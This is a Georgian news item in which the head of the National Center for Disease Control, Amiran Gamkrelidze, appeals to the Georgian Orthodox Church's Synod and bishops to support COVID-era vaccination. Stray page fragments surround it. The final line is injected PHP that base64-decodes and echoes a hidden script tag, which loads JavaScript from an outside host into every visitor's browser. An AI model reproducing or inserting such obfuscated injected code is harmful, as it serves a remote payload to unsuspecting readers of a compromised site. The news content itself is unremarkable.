celsiusi
ავერსი საქკაბელი
როგორც  დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ NCDC-ში გამართულ სპეციალურ პრესკონფერენციაზე ჟურნალისტის მიერ ეკლესიასთან დაკავშირებით დასმული კითხვის საპასუხა , საქართველოს ეკლესია ქვეყანაში ერთ-ერთი ყველაზე ავტორიტეტული ორგანიზაციაა და მოსახლეობაზე მნიშვნელოვან გავლენას ახდენს. 
 
„ვსარგებლობ შემთხვევით და მინდა ვთხოვო წმინდა სინოდს, თითოეულ მღვდელმთავარს - მათი როლი ამ უმნიშვნელოვანეს პროცესში განსაკუთრებულია. ტყუილად არ მითქვამს, რომ ბოლო 200 წლის განმავლობაში ვაქცინებმა და ვაქცინაციამ მილიონობით ადამიანის სიცოცხლე იხსნა. ვაქცინაცია მეცნიერულად დასაბუთებულია. ეკლესიას და მეცნიერებას ყოველთვის სინერგიული დამოკიდებულება აქვს. ეკლესია ყოველთვის ეყრდნობა მეცნიერულად დასაბუთებულ ფაქტებს და ვაქცინაციის სიკეთე მეცნიერულადაა დასაბუთებული, რომელიც კაცობრიობის ისტორიამ გამოსცადა.
 
ამიტომ ძალიან გთხოვთ, გვერდში დაგვიდგეთ ექიმებს ამ პერიოდში და ვითანამშრომლოთ, რადგან მოსახლეობას თქვენი ძალიან სჯერა, ბევრ შემთხვევაში ექიმზე უფრო მეტად. ამიტომ, გთხოვთ, ვაქცინაციის პროცესში განსაკუთრებული თანამშრომლობა იყოს. მზად ვართ ნებისმიერი შეხვედრისთვის, რომელიც ყოველთვის იმართება. ჩვენთვის ძალიან დიდი პატივია საქართველოს ეკლესიასთან თანამშრომლობა. დარწმუნებული ვარ, ერთად მივაღწევთ სასურველ შედეგს“, - განაცხადა ამირან გამყრელიძემ.
 
1911
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");